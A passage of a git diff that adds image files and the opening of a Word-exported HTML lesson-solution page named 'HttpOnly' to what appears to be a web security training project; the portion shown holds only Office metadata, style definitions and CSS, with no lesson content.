index 000000000..783a404ed
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpBasics_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/image003.png b/main/project/WebContent/lesson_solutions/HttpBasics_files/image003.png
new file mode 100644
index 000000000..7d0a0830c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpBasics_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/image005.jpg b/main/project/WebContent/lesson_solutions/HttpBasics_files/image005.jpg
new file mode 100644
index 000000000..7b9b508a5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpBasics_files/image005.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/image006.jpg b/main/project/WebContent/lesson_solutions/HttpBasics_files/image006.jpg
new file mode 100644
index 000000000..cb6599a1f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpBasics_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics_files/themedata.thmx b/main/project/WebContent/lesson_solutions/HttpBasics_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HttpBasics_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/HttpOnly.html b/main/project/WebContent/lesson_solutions/HttpOnly.html
new file mode 100644
index 000000000..467dcc903
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpOnly.html
@@ -0,0 +1,863 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/HttpOnly_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpOnly_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1195</o:TotalTime>
+  <o:Created>2007-07-12T11:19:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>245</o:Words>
+  <o:Characters>1399</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>11</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1641</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/HttpOnly_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpOnly_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-noshow:yes;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-ascii-font-family:"Times New Roman";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
